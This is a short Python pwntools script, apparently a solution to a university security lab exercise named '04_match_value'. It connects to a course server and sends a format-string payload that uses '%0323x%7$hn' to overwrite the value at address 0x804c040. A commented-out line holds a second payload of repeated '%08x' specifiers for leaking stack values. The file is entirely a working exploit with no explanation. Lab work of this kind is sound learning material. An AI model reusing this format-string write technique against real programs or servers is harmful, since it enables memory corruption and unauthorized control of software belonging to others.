19 lines
427 B
Python
19 lines
427 B
Python
from pwn import remote, process, p32
|
|
|
|
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
|
|
PORT = 25194
|
|
|
|
conn = remote(HOST, PORT)
|
|
#conn = process("04_match_value")
|
|
#input()
|
|
|
|
tgt_addr = p32(0x804c040)
|
|
|
|
#327 - 4(ptr) = 323
|
|
pl = tgt_addr+b"%0323x%7$hn\n"
|
|
#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
|
|
|
|
conn.send(pl)
|
|
while conn.connected():
|
|
print(chr(conn.recv(1)[0]), end="", flush=True)
|